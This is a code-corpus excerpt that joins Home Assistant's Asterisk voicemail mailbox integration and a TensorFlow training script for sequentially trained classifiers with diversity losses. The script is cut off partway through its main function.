"path": "data/scripts/templates/object/tangible/wearables/bandolier/shared_ith_mercenary_bandolier.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
} |
"""
Asterisk Voicemail interface.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/mailbox.asteriskvm/
"""
import logging
from homeassistant.components.asterisk_mbox import DOMAIN as ASTERISK_DOMAIN
from homeassistant.components.mailbox import (
CONTENT_TYPE_MPEG, Mailbox, StreamError)
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['asterisk_mbox']
SIGNAL_MESSAGE_REQUEST = 'asterisk_mbox.message_request'
SIGNAL_MESSAGE_UPDATE = 'asterisk_mbox.message_updated'
async def async_get_handler(hass, config, discovery_info=None):
    """Set up the Asterisk VM mailbox platform.

    Returns the mailbox instance; config and discovery_info are unused.
    """
    return AsteriskMailbox(hass, ASTERISK_DOMAIN)
class AsteriskMailbox(Mailbox):
    """Mailbox provider backed by the asterisk_mbox component's client."""

    def __init__(self, hass, name):
        """Initialize Asterisk mailbox."""
        super().__init__(hass, name)
        # Refresh whenever the asterisk_mbox component signals that the
        # message list changed.
        async_dispatcher_connect(
            self.hass, SIGNAL_MESSAGE_UPDATE, self._update_callback)

    @callback
    def _update_callback(self, msg):
        """Update the message count in HA, if needed."""
        # `msg` payload is unused; async_update re-reads component data.
        self.async_update()

    @property
    def media_type(self):
        """Return the supported media type (MP3 audio)."""
        return CONTENT_TYPE_MPEG

    @property
    def can_delete(self):
        """Return if messages can be deleted."""
        return True

    @property
    def has_media(self):
        """Return if messages have attached media files."""
        return True

    async def async_get_media(self, msgid):
        """Return the media blob for the msgid.

        Raises StreamError when the asterisk_mbox server reports an error.
        """
        from asterisk_mbox import ServerError
        client = self.hass.data[ASTERISK_DOMAIN].client
        try:
            # sync=True blocks until the server returns the MP3 payload.
            return client.mp3(msgid, sync=True)
        except ServerError as err:
            raise StreamError(err)

    async def async_get_messages(self):
        """Return a list of the current messages."""
        return self.hass.data[ASTERISK_DOMAIN].messages

    def async_delete(self, msgid):
        """Delete the specified messages.

        NOTE(review): not a coroutine despite the async_ prefix --
        confirm the Mailbox base class accepts a plain method here.
        """
        client = self.hass.data[ASTERISK_DOMAIN].client
        _LOGGER.info("Deleting: %s", msgid)
        client.delete(msgid)
        return True
| {
"content_hash": "99d60a83c0dc543880c396caa73ff20c",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 76,
"avg_line_length": 30.56,
"alnum_prop": 0.6697207678883071,
"repo_name": "tinloaf/home-assistant",
"id": "087018084f2c781ce5f3a6374c8a33afaa4a564c",
"size": "2292",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/mailbox/asterisk_mbox.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1175"
},
{
"name": "Dockerfile",
"bytes": "1099"
},
{
"name": "Python",
"bytes": "13135313"
},
{
"name": "Ruby",
"bytes": "745"
},
{
"name": "Shell",
"bytes": "17137"
}
],
"symlink_target": ""
} |
"""Trains a classifier and evaluates finetuning performance. Specifically for sequential training of models"""
from typing import Sequence
from absl import app
from absl import flags
from absl import logging
import numpy as np # pylint: disable=unused-import
import resnet
import tensorflow as tf
from load_data import load_data
from train import train
from model import *
FLAGS = flags.FLAGS

# --- Optimization / training-schedule flags. ---
flags.DEFINE_float('batch_norm_decay', 0.9, 'Batch norm decay parameter.')
flags.DEFINE_float('rr_weight', 0.0,
                   'Weight for the redundancy reduction term.')
flags.DEFINE_bool('use_rr_loss', False, 'Use redundancy reduction term.')
flags.DEFINE_bool('class_specific_rr_loss', True, 'Use class specific RR loss.')
flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.')
flags.DEFINE_float('momentum', 0.9, 'momentum for SGD.')
flags.DEFINE_integer('train_batch_size', 64, 'Batch size for training.')
flags.DEFINE_integer('train_epochs', 100, 'Number of epochs to train for.')
flags.DEFINE_integer('train_epochs_finetune', 50,
                     'Number of epochs to finetune for.')
flags.DEFINE_integer('train_steps', 0,
                     'Number of train steps. If > 0, overrides train epochs')
flags.DEFINE_integer(
    'train_steps_finetune', 0,
    'Number of train finetune steps. If > 0, overrides train epochs finetune')
flags.DEFINE_integer(
    'eval_steps', 0,
    'Number of steps to eval for. If not provided, evals over entire dataset.')
flags.DEFINE_integer('lr_decay_gap', 50, 'Gap between decaying lr')
flags.DEFINE_float('lr_decay_factor', 0.5, 'Value to decay lr by')
flags.DEFINE_integer('val_batch_size', 256, 'Batch size for eval.')
flags.DEFINE_integer('test_batch_size', 256, 'Batch size for eval.')
flags.DEFINE_integer('num_train', -1, 'Num training examples.')
flags.DEFINE_integer('num_test', -1, 'Num test examples.')
flags.DEFINE_integer('num_train_finetune', 20000,
                     'Num training examples for finetuning.')
flags.DEFINE_integer('num_test_finetune', 2000,
                     'Num test examples for finetuning.')
flags.DEFINE_integer('buffer_size', 256, 'Buffer size for shuffling.')
flags.DEFINE_integer('checkpoint_epochs', 1,
                     'Number of epochs between checkpoints/summaries.')

# --- Dataset / input-pipeline flags. ---
flags.DEFINE_string('dataset', 'waterbirds', 'Name of a dataset.')
flags.DEFINE_bool(
    'cache_dataset', False,
    'Whether to cache the entire dataset in memory. If the dataset is '
    'ImageNet, this is a very bad idea, but for smaller datasets it can '
    'improve performance.')
flags.DEFINE_bool('use_dropout_pretrain', False,
                  'Whether to use dropout on the final layer for pretraining.')
flags.DEFINE_float('dropout_rate', 0.0,
                   'Dropout rate for final layer for pretraining.')
flags.DEFINE_bool(
    'finetune_from_random', False,
    'Whether to initialize the finetuning model using random weights.')
flags.DEFINE_enum(
    'train_mode', 'pretrain', ['pretrain', 'finetune'],
    'The train mode controls different objectives and trainable components.')
flags.DEFINE_string('platform', 'GPU', 'To be run on GPU or TPU.')
flags.DEFINE_float('validation_split', 0.2,
                   'Validation split to use while training.')
flags.DEFINE_string(
    'checkpoint', None,
    'Loading from the given checkpoint for fine-tuning if a finetuning '
    'checkpoint does not already exist in model_dir.')
flags.DEFINE_string('optimizer', 'sgd', 'Optimizer to be used.')
flags.DEFINE_bool('project_out_prev_w', False, 'Project out previous w')
flags.DEFINE_bool(
    'zero_init_logits_layer', False,
    'If True, zero initialize layers after avg_pool for supervised learning.')
flags.DEFINE_bool('use_data_aug_with_DRO', False, 'True or False')
flags.DEFINE_integer(
    'fine_tune_after_block', -1,
    'The layers after which block that we will fine-tune. -1 means fine-tuning '
    'everything. 0 means fine-tuning after stem block. 4 means fine-tuning '
    'just the linear head.')
flags.DEFINE_integer('keep_checkpoint_max', 5,
                     'Maximum number of checkpoints to keep.')

# --- Learning-rate schedule flags. ---
flags.DEFINE_enum('lr_decay_type', 'step_decay',
                  ['step_decay', 'cosine_decay', 'warmup_cosine_decay'],
                  'Kind of decay to be used for learning rate')
flags.DEFINE_enum('learning_rate_scaling', 'linear', ['linear', 'sqrt'],
                  'Learning rate scaling to use')
flags.DEFINE_integer('warmup_steps', 0, 'Warmup steps for warmup and cosine decay')
flags.DEFINE_integer('warmup_epochs', 20, 'Warmup epochs for warmup and cosine decay')

# --- Architecture flags. ---
flags.DEFINE_boolean(
    'global_bn', True,
    'Whether to aggregate BN statistics across distributed cores.')
flags.DEFINE_integer('proj_dim', 20, 'Output dimension of projection head')
flags.DEFINE_integer(
    'num_heads', 1,
    'Number of heads across which to decorrelate. One head is the standard config'
)
flags.DEFINE_integer('width_multiplier', 1,
                     'Multiplier to change width of network.')
flags.DEFINE_integer('resnet_depth', 50, 'Depth of ResNet.')
flags.DEFINE_float(
    'sk_ratio', 0.,
    'If it is bigger than 0, it will enable SK. Recommendation: 0.0625.')
flags.DEFINE_float('se_ratio', 0., 'If it is bigger than 0, it will enable SE.')
flags.DEFINE_float('weight_decay', 1e-4, 'weight decay to be used')
flags.DEFINE_float('logit_decay', 0.0, 'Decay to be used on logits')
flags.DEFINE_integer('image_size', 32, 'Input image size.')

# --- Validation / evaluation cadence flags. ---
flags.DEFINE_integer('val_epochs_gap', 10, 'Epoch gap to run validation after')
flags.DEFINE_integer('finetune_val_epochs_gap', 10,
                     'Epoch gap to run validation after')
flags.DEFINE_integer('val_steps_gap', 0, 'Steps gap to run validation after')
flags.DEFINE_integer('finetune_val_steps_gap', 0,
                     'Steps gap to run validation after')
flags.DEFINE_boolean('use_pretrained', True, 'whether to use pretrained model')
flags.DEFINE_string(
    'path', '/cns/sa-d/home/mloa/data/waterbirds_landbirds/waterbirds.pkl',
    'path for the dataset')
flags.DEFINE_bool('use_OOD_transform', False,
                  'Use data preprocessing specific to OOD dataset')
flags.DEFINE_float('clip_norm', None, 'global clip norm for the gradient')
flags.DEFINE_integer('num_runs', 1,
                     'Number of runs to average the evaluations over')
flags.DEFINE_integer('num_head_layers', 1, 'Number of layers to use in head')
flags.DEFINE_bool('use_early_stopping', False, 'Whether to use early stopping based on validation accuracy or not')
flags.DEFINE_integer('proj_layer', 0,
                     'Layer in head where applying projection for rr')
flags.DEFINE_integer('head_dim', 512, 'Dimension of head layers')
flags.DEFINE_string('model_dir', None, 'Path for loading/saving a model')
flags.DEFINE_string('model_finetune_dir', None,
                    'Path for loading/saving the model after finetuning')
flags.DEFINE_bool('use_seq_rr', True, 'Whether to use rr loss sequentially')
flags.DEFINE_integer('num_seq_models', 2, 'Number of sequential models to train')
flags.DEFINE_bool('load_model', False, 'whether to try to load model')
flags.DEFINE_bool('save_model', False, 'whether to save model')

# --- Redundancy-reduction / mutual-information loss flags. ---
flags.DEFINE_bool('lowerbound_rr', False, 'Whether to lowerbound rr loss')
flags.DEFINE_float('lowerbound_factor', 0.5, 'If lowerbound rr, by what factor of expected value')
flags.DEFINE_bool('use_exp_var_loss', False, 'Use explained away variance as loss')
flags.DEFINE_bool('use_MI_loss', False, 'Use MI based loss function')
flags.DEFINE_integer('CIFAR_label_1', 1, 'CIFAR class 1 for MNIST-CIFAR dataset')
flags.DEFINE_integer('CIFAR_label_2', 9, 'CIFAR class 2 for MNIST-CIFAR dataset')
flags.DEFINE_integer('MNIST_label_1', 0, 'MNIST class 1 for MNIST-CIFAR dataset')
flags.DEFINE_integer('MNIST_label_2', 1, 'MNIST class 2 for MNIST-CIFAR dataset')
flags.DEFINE_float('corr_frac', 1.0, 'Correlation factor of MNIST and CIFAR for MNIST-CIFAR dataset')
flags.DEFINE_bool('use_proj_head', True, 'Use a projection head in the model')
flags.DEFINE_bool('normalize_MI', False, 'Normalize MI based loss')
flags.DEFINE_bool('use_logit_decorr', False, 'Use logit decorrelation')
flags.DEFINE_bool('use_prob_decorr', False, 'Use probability decorrelation')
flags.DEFINE_bool('use_val_for_MI', False, 'Use validation set for MI based loss')
flags.DEFINE_bool('use_cifar_aug', False, 'Use CIFAR augmentation in MNIST-CIFAR dataset')
flags.DEFINE_bool('use_mnist_aug', False, 'Use MNIST augmentation in MNIST-CIFAR dataset')
flags.DEFINE_integer('num_classes', 10, 'Number of classes')
flags.DEFINE_bool('monitor_rr_grad_norms', False, 'Monitor rr gradient norms')
flags.DEFINE_float('use_rr_after_frac', 0.0, 'Use rr after a fraction of steps')
flags.DEFINE_bool('use_sq_MI', False, 'Use squared MI as loss instead of MI, for better gradients')
flags.DEFINE_bool('use_disagr_loss', False, 'use disagreement based loss')
flags.DEFINE_bool('normalize_MI_random', False, 'normalize MI by randomly shuffling probabilities')
flags.DEFINE_bool('use_num_sq_MI', False, 'Use the MI loss of the form (MI^2)/y so as to get properly scaled gradients')
flags.DEFINE_bool('use_stop_grad', False, 'Use stop gradient for MI normalization factor')
flags.DEFINE_bool('use_HSIC_loss', False, 'Use HSIC based independence test loss')
flags.DEFINE_bool('use_HSIC_diff', False, 'Use HSIC on logit difference')
flags.DEFINE_bool('lin_scale_rr_weight', False, 'Linearly scale down rr weight as number of sequential models goes up')

# --- LMS (linear + slabs) synthetic-dataset flags. ---
flags.DEFINE_integer('dataset_dim', 2, 'Dimension of LMS dataset')
flags.DEFINE_integer('num_lin', 1, 'Number of linear dimensions')
flags.DEFINE_integer('num_3_slabs', 1, 'Number of 3 slabs')
flags.DEFINE_integer('num_5_slabs', 0, 'Number of 5 slabs')
flags.DEFINE_integer('num_7_slabs', 0, 'Number of 7 slabs')
flags.DEFINE_bool('use_random_transform', False, 'Use random transformation of input coordinates')
flags.DEFINE_float('lin_margin', 0.1, 'Linear coordinate margin')
flags.DEFINE_float('slab_margin', 0.05, 'Slab coordinate margin')
flags.DEFINE_integer('fcn_layers', 3, 'Number of layers in FCN net for lms dataset')
flags.DEFINE_integer('hidden_dim', 512, 'Hidden dimension for FCN')
flags.DEFINE_bool('randomize_linear', False, 'Randomize linear coordinate in the dataset')
flags.DEFINE_bool('randomize_slabs', False, 'Randomize slab coordinates in the dataset')
flags.DEFINE_bool('turn_off_randomize_later', False, 'Turn off coordinate randomization later')
flags.DEFINE_bool('use_L4_reg', False, 'Use L4 instead of L2 regularization')
flags.DEFINE_bool('use_bn', True, 'Use BN in architecture')

# --- HSIC-on-features flags. ---
flags.DEFINE_bool('use_HSIC_on_features', False, 'Use HSIC based loss on feature layers')
flags.DEFINE_integer('HSIC_feature_layer', 0, 'Feature layer to use HSIC loss on')
flags.DEFINE_multi_integer('HSIC_feature_layers', None, 'Feature layers to use HSIC loss on')
flags.DEFINE_bool('use_all_features_HSIC', False, 'Use features at all the layers for HSIC loss')
flags.DEFINE_bool('use_sq_HSIC', False, 'Square HSIC loss to manage gradients as loss goes down')
flags.DEFINE_bool('use_GAP_HSIC_features', True, 'Use GAP on HSIC features')
flags.DEFINE_bool('use_random_projections', False, 'Use random projections')
flags.DEFINE_integer('random_proj_dim', 1, 'Random projection dimension')
flags.DEFINE_bool('use_prev_logits_HSIC_features', False, 'Use logits of previous models for computing HSIC on features')
flags.DEFINE_bool('use_MNIST_labels', False, 'Use MNIST labels in MNIST-CIFAR')
flags.DEFINE_bool('switch_corr_later', False, 'Change correlation after first model')
flags.DEFINE_bool('switch_labels_later', False, 'Switch whether to use CIFAR or MNIST labels after first model')

# --- Monitoring / diagnostics flags. ---
flags.DEFINE_bool('monitor_EG_overlap', False, 'Monitor expected gradients overlap across models')
flags.DEFINE_bool('monitor_robustness_measures', False, 'Monitor Gaussian, mask and RDE based robustness measures')
flags.DEFINE_bool('monitor_error_diversity', False, 'Monitor error diversity')
flags.DEFINE_bool('monitor_logit_correlation', False, 'Monitor logit correlation')
flags.DEFINE_bool('sep_short_direct_branch', False, 'Separately make shortcut and direct branch independent of previous model')

# --- Pretrained-model loading flags. ---
flags.DEFINE_bool('use_pretrained_model_1', False, 'Utilise a pretrained first model.')
flags.DEFINE_string('pretrained_model_path', None, 'Path for first pretrained model')
flags.DEFINE_multi_string('pretrained_model_paths', None, 'Paths for pretrained models')
flags.DEFINE_multi_string('pretrained_checkpoint_paths', None, 'Paths for pretrained checkpoints')
flags.DEFINE_bool('use_indexed_checkpoints', False, 'Use particular checkpoint index')
flags.DEFINE_bool('check_tf_func', False, 'Check tf func')
flags.DEFINE_bool('use_FCN', False, 'Use FCN architecture')
flags.DEFINE_bool('monitor_EG_loss', False, 'Monitor EG loss')
flags.DEFINE_bool('use_equal_split', False, 'Use equal split for DRO setting')
flags.DEFINE_bool('use_EG_loss', False, 'Use expected gradients loss for avoiding collapse')
# Typo fix in help text: 'referneces' -> 'references'.
flags.DEFINE_integer('num_ref_EG_loss', 2, 'Number of references in EG loss')
flags.DEFINE_float('EG_loss_weight', 1e-3, 'Weight of EG loss')
flags.DEFINE_bool('binary_classification', False, 'Use binary classification and logistic loss')
flags.DEFINE_bool('use_color_labels', False, 'Use colors for label in color-MNIST or binary-color-MNIST')
flags.DEFINE_bool('use_CNN', False, 'Use custom CNN architecture')
flags.DEFINE_bool('use_HSIC_ratio', False, 'Use HSIC ratio as the loss')
flags.DEFINE_string(
    'master', 'local',
    "BNS name of the TensorFlow master to use. 'local' for GPU.")
flags.DEFINE_integer('project_out_rank', 0, 'Projecting certain dimensions out of input')
flags.DEFINE_float('project_out_factor', 0.0, 'Projecting out factor')
flags.DEFINE_float('eig_cutoff_factor', 0.0, 'Eigenvalue cutoff factor')
flags.DEFINE_integer('check_ranks_max', 10, 'Check rank of 1st hidden matrix')
flags.DEFINE_multi_integer('filters', [16, 32, 64], 'Filters to be used in a CNN')
flags.DEFINE_multi_integer('kernel_sizes', [3, 3, 3], 'kernel sizes to be used in a CNN')
flags.DEFINE_multi_integer('strides', [1, 2, 1], 'Strides to be used in a CNN')
flags.DEFINE_multi_integer('project_out_vecs', [1, 2], 'Number of top SVD vectors to project out')
flags.DEFINE_bool('use_chizat_init', False, 'Whether to use chizat-bach initialization in head')
flags.DEFINE_bool('project_out_w', False, 'Project out w from representations')
flags.DEFINE_bool('use_complete_corr', False, 'Use complete correlation in DRO setting')
flags.DEFINE_bool('use_complete_corr_test', False, 'Use complete correlation in DRO setting')
flags.DEFINE_bool('flip_err_div_for_minority', False, 'Flip error diversity calc for minority classes')
flags.DEFINE_bool('measure_feat_robust', False, 'Measure robustness of features')
flags.DEFINE_float('max_gauss_noise_std', 5.0, 'Maximum gaussian noise std')
flags.DEFINE_boolean('use_tpu', True, 'Should we use TPU?')
flags.DEFINE_bool('check_torch_reps', False, 'Check torch reps')
flags.DEFINE_boolean(
    'train_split', 1,
    'Use train validation split while training, If set to false, use entire training dataset'
)
flags.DEFINE_bool('finetune_only_linear_head', False, 'Finetune only linear head')

# Flags kept as module-level handles and read via `.value` in main().
_FRAC_POISON = flags.DEFINE_float('frac_poison', 0.,
                                  'Fraction of poisoned examples.')
# Consistency fix: main() and TASK_STAGES handle 'CIFAR-MNIST', 'LMS',
# 'MNIST', 'color-MNIST' and 'Imagenette', but the original enum did not
# allow them, so those task ids could never be selected from the command
# line. Adding them is backward-compatible (default unchanged).
_TASK_ID = flags.DEFINE_enum('task_id', 'DRO', [
    'Data-poisoning', 'DRO', 'Few-shot', 'CIFAR-10.2', 'CIFAR-10.2-finetune',
    'CINIC', 'CINIC-finetune', 'CIFAR-MNIST', 'LMS', 'MNIST', 'color-MNIST',
    'Imagenette'
], 'Specify the task that needs to be run.')
_FINETUNE_ONLY_HEAD = flags.DEFINE_bool(
    'finetune_only_head', False, 'whether to finetune head or the entire model')
_TRAIN_CLASSES = flags.DEFINE_multi_integer(
    'train_classes', [0, 1, 2, 3, 4], 'classes to train for few-shot learning')
_FINETUNE_CLASSES = flags.DEFINE_multi_integer(
    'finetune_classes', [5, 6, 7, 8, 9],
    'classes to finetune for few-shot learning')
# Pipeline stages to execute for each task; main() looks this up via
# TASK_STAGES[_TASK_ID.value] and runs the listed stages in order.
TASK_STAGES = {
    'Data-poisoning': ['Train'],
    'DRO': ['Train'],
    'Few-shot': ['Train', 'Finetune'],
    'CIFAR-10.2': ['Train'],
    'CIFAR-10.2-finetune': ['Train'],
    'CINIC': ['Train'],
    'CINIC-finetune': ['Train'],
    'CIFAR-MNIST': ['Train'],
    'LMS': ['Train'],
    'MNIST': ['Train'],
    'color-MNIST': ['Train'],
    'Imagenette': ['Train'],
}
def createmodel(num_classes,
                head_dim,
                head_layers,
                proj_dim,
                proj_layer,
                use_proj=True,
                resnet_base=None,
                dropout_rate=0.0,
                num_heads=1):
  """Creates a classifier from a convolutional backbone and an MLP head.

  Args:
    num_classes: Number of output classes for the final logits layer.
    head_dim: Width of every hidden layer in the head.
    head_layers: Number of hidden layers in the head.
    proj_dim: Output dimension of the projection used for the redundancy
      reduction loss.
    proj_layer: Index of the head layer at which the projection is applied.
    use_proj: Whether to attach a projection head.
    resnet_base: Optional pre-built backbone. If None, a ResNet is created
      from FLAGS.resnet_depth / FLAGS.width_multiplier.
    dropout_rate: Dropout rate applied in the head.
    num_heads: Number of classification heads; values > 1 build a
      multi-head model.

  Returns:
    The assembled model (multihead_model or head_model).
  """
  if resnet_base is None:
    # Small inputs (<= 32px) get the CIFAR-style stem.
    resnet_base = resnet.resnet(
        resnet_depth=FLAGS.resnet_depth,
        width_multiplier=FLAGS.width_multiplier,
        cifar_stem=FLAGS.image_size <= 32)
  # Constant-width stack of head-layer sizes. Kept as the original
  # `head_dim + np.zeros(...)` expression (a float ndarray) so the head
  # constructors receive exactly the values they always have.
  head_dims = head_dim + np.zeros(head_layers)
  if num_heads > 1:
    # NOTE(review): only the single-head path forwards FLAGS.use_bn —
    # confirm whether multihead_model should receive it as well.
    model = multihead_model(
        resnet_base,
        num_classes,
        proj_dim,
        proj_layer,
        head_dims,
        num_heads,
        use_proj=use_proj,
        dropout_rate=dropout_rate)
  else:
    model = head_model(
        resnet_base,
        num_classes,
        proj_dim,
        proj_layer,
        head_dims,
        use_proj=use_proj,
        dropout_rate=dropout_rate,
        use_bn=FLAGS.use_bn)
  return model
def main(argv: Sequence[str]) -> None:
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
logging.info(tf.__version__)
tf.config.set_soft_device_placement(True)
logging.info('Successfully entered')
# Setup the execution strategy
if FLAGS.platform == 'GPU':
strategy = tf.distribute.MirroredStrategy()
# strategy = tf.distribute.experimental.MultiWorkerMirroredStrategy()
elif FLAGS.platform == 'TPU':
# Setup and connect to TPU cluster
resolver = tf.distribute.cluster_resolver.TPUClusterResolver(tpu=FLAGS.master)
tf.config.experimental_connect_to_cluster(resolver)
tf.tpu.experimental.initialize_tpu_system(resolver)
strategy = tf.distribute.experimental.TPUStrategy(resolver)
else:
raise ValueError('Unknown platform {}'.format(FLAGS.platform))
logging.set_verbosity(logging.INFO)
logging.info('Learning rate = %f, Batch size = %d', FLAGS.learning_rate,
FLAGS.train_batch_size)
adjust = 0
if FLAGS.use_pretrained_model_1:
adjust=FLAGS.num_seq_models - 1
# Hack to make val epochs gap equal to train epochs
if FLAGS.task_id in ['CIFAR-10.2', 'CIFAR-10.2-finetune', 'CINIC', 'CINIC-finetune', 'CIFAR-MNIST', 'MNIST', 'color-MNIST', 'LMS']:
FLAGS.finetune_val_epochs_gap = FLAGS.train_epochs_finetune
FLAGS.finetune_val_steps_gap = FLAGS.train_steps_finetune
FLAGS.val_batch_size = FLAGS.train_batch_size
FLAGS.test_batch_size = FLAGS.train_batch_size
if FLAGS.binary_classification:
FLAGS.num_classes = 1
if FLAGS.proj_layer == -1:
FLAGS.proj_layer = FLAGS.num_head_layers
if FLAGS.turn_off_randomize_later and FLAGS.use_random_transform:
raise ValueError('Not supporting random transform and turn off randomize simultaneously as of now')
for stage in TASK_STAGES[_TASK_ID.value]:
if stage == 'Train':
logging.info('Loading training dataset.')
with strategy.scope():
MI_ds = None
W = None
if FLAGS.task_id == 'CIFAR-10.2' or FLAGS.task_id == 'CIFAR-10.2-finetune':
ds_train, ds_val, ds_test, ds_OOD_train, ds_OOD_test, train_len, OOD_train_len = load_data(
dataset=FLAGS.dataset,
desired_classes=_TRAIN_CLASSES.value,
num_train=FLAGS.num_train,
num_test=FLAGS.num_test,
frac_poison=_FRAC_POISON.value,
path=FLAGS.path)
elif FLAGS.task_id in ['CINIC', 'CINIC-finetune', 'color-MNIST', 'CIFAR-MNIST']:
ds_train, ds_val, ds_test, ds_OOD_train, ds_OOD_val, ds_OOD_test, train_len, OOD_train_len = load_data(
dataset=FLAGS.dataset,
desired_classes=_TRAIN_CLASSES.value,
num_train=FLAGS.num_train,
num_test=FLAGS.num_test,
frac_poison=_FRAC_POISON.value,
path=FLAGS.path)
elif FLAGS.task_id == 'LMS':
ds_train, ds_val, ds_test, ds_OOD_train, ds_OOD_val, ds_OOD_test, train_len, OOD_train_len, W = load_data(
dataset=FLAGS.dataset,
desired_classes=_TRAIN_CLASSES.value,
num_train=FLAGS.num_train,
num_test=FLAGS.num_test,
frac_poison=_FRAC_POISON.value,
path=FLAGS.path)
else:
ds_train, ds_val, ds_test, train_len = load_data(
dataset=FLAGS.dataset,
desired_classes=_TRAIN_CLASSES.value,
num_train=FLAGS.num_train,
num_test=FLAGS.num_test,
frac_poison=_FRAC_POISON.value,
path=FLAGS.path)
logging.info('Successfully loaded training dataset')
vals_avg = []
vals_avg_2 = []
vals_avg_3 = []
vals_avg_4 = []
vals_std = []
vals_std_2 = []
vals_std_3 = []
vals_std_4 = []
temp1 = FLAGS.randomize_linear
temp2 = FLAGS.randomize_slabs
temp3 = FLAGS.corr_frac
temp4 = FLAGS.use_MNIST_labels
for run in range(FLAGS.num_runs):
if FLAGS.turn_off_randomize_later:
FLAGS.randomize_linear = temp1
FLAGS.randomize_slabs = temp2
with strategy.scope():
ds_train, ds_val, ds_test, ds_OOD_train, ds_OOD_val, ds_OOD_test, train_len, OOD_train_len, W = load_data(
dataset=FLAGS.dataset,
desired_classes=_TRAIN_CLASSES.value,
num_train=FLAGS.num_train,
num_test=FLAGS.num_test,
frac_poison=_FRAC_POISON.value,
path=FLAGS.path)
if FLAGS.switch_corr_later or FLAGS.switch_labels_later:
if FLAGS.switch_corr_later:
FLAGS.corr_frac = temp3
if FLAGS.switch_labels_later:
FLAGS.use_MNIST_labels = temp4
with strategy.scope():
ds_train, ds_val, ds_test, ds_OOD_train, ds_OOD_val, ds_OOD_test, train_len, OOD_train_len = load_data(
dataset=FLAGS.dataset,
desired_classes=_TRAIN_CLASSES.value,
num_train=FLAGS.num_train,
num_test=FLAGS.num_test,
frac_poison=_FRAC_POISON.value,
path=FLAGS.path)
models = []
for model_seq in range(FLAGS.num_seq_models):
with strategy.scope():
if model_seq == 1 and FLAGS.turn_off_randomize_later:
FLAGS.randomize_linear = False
FLAGS.randomize_slabs = False
ds_train, ds_val, ds_test, ds_OOD_train, ds_OOD_val, ds_OOD_test, train_len, OOD_train_len, W = load_data(
dataset=FLAGS.dataset,
desired_classes=_TRAIN_CLASSES.value,
num_train=FLAGS.num_train,
num_test=FLAGS.num_test,
frac_poison=_FRAC_POISON.value,
path=FLAGS.path)
if model_seq == 1 and (FLAGS.switch_corr_later or FLAGS.switch_labels_later):
if FLAGS.switch_corr_later:
FLAGS.corr_frac = 1.0
if FLAGS.switch_labels_later:
FLAGS.use_MNIST_labels = not(temp4)
ds_train, ds_val, ds_test, ds_OOD_train, ds_OOD_val, ds_OOD_test, train_len, OOD_train_len = load_data(
dataset=FLAGS.dataset,
desired_classes=_TRAIN_CLASSES.value,
num_train=FLAGS.num_train,
num_test=FLAGS.num_test,
frac_poison=_FRAC_POISON.value,
path=FLAGS.path)
if FLAGS.task_id == 'DRO' or FLAGS.task_id == 'Imagenette':
if FLAGS.use_pretrained:
# tmp_filepath = '/tmp/weights_resnet50.h5'
# tf.io.gfile.copy('/cns/sa-d/home/mloa/models/waterbirds/resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5', tmp_filepath, overwrite=True)
if FLAGS.check_torch_reps:
base_model = tf.keras.Sequential()
base_model.add(tf.keras.layers.Layer())
else:
if model_seq==0:
base_model = tf.keras.applications.resnet50.ResNet50(
include_top=False, weights='imagenet', pooling='avg')
# tf.io.gfile.remove(tmp_filepath)
else:
if FLAGS.resnet_depth == 50:
base_model = tf.keras.applications.resnet50.ResNet50(
include_top=False, weights=None, pooling='avg')
else:
base_model = resnet.resnet(
resnet_depth=FLAGS.resnet_depth,
width_multiplier=FLAGS.width_multiplier,
cifar_stem=False)
#layer_names = ['input_1', 'pool1_pool', 'conv2_block3_out', 'conv3_block4_out', 'conv4_block6_out', 'avg_pool']
#layers = [base_model.get_layer(x).output for x in layer_names]
#base_model = tf.keras.Model(base_model.input, outputs=layers)
model = createmodel(
FLAGS.num_classes,
FLAGS.head_dim,
FLAGS.num_head_layers,
FLAGS.proj_dim,
FLAGS.proj_layer,
resnet_base=base_model,
dropout_rate=FLAGS.dropout_rate,
num_heads=FLAGS.num_heads,
use_proj=FLAGS.use_proj_head)
elif FLAGS.task_id in ['CIFAR-10.2', 'CIFAR-10.2-finetune', 'CINIC', 'CINIC-finetune', 'CIFAR-MNIST', 'MNIST', 'color-MNIST']:
if FLAGS.use_pretrained:
if model_seq == 0:
resnet_base = tf.keras.applications.resnet50.ResNet50(
include_top=False, weights='imagenet', pooling='avg')
elif FLAGS.use_FCN:
hid_dims = FLAGS.hidden_dim + np.zeros(FLAGS.fcn_layers)
resnet_base = FCN_backbone(hid_dims)
elif FLAGS.use_CNN:
resnet_base = CNN_backbone(filters = FLAGS.filters, kernel_sizes=FLAGS.kernel_sizes,
strides=FLAGS.strides)
else:
resnet_base = None
model = createmodel(
FLAGS.num_classes,
FLAGS.head_dim,
FLAGS.num_head_layers,
FLAGS.proj_dim,
FLAGS.proj_layer,
resnet_base=resnet_base,
dropout_rate=FLAGS.dropout_rate,
num_heads=FLAGS.num_heads,
use_proj=FLAGS.use_proj_head)
elif FLAGS.task_id == 'LMS':
if FLAGS.use_pretrained:
resnet_base = tf.keras.Sequential()
resnet_base.add(tf.keras.layers.Layer())
else:
hid_dims = FLAGS.hidden_dim + np.zeros(FLAGS.fcn_layers)
resnet_base = FCN_backbone(hid_dims, use_bn=FLAGS.use_bn)
model = createmodel(
FLAGS.num_classes,
FLAGS.head_dim,
FLAGS.num_head_layers,
FLAGS.proj_dim,
FLAGS.proj_layer,
resnet_base=resnet_base,
dropout_rate=FLAGS.dropout_rate,
num_heads=FLAGS.num_heads,
use_proj=FLAGS.use_proj_head)
else:
model = createmodel(
len(_TRAIN_CLASSES.value),
512,
0,
512,
0,
resnet_base=None,
use_proj=False,
dropout_rate=FLAGS.dropout_rate)
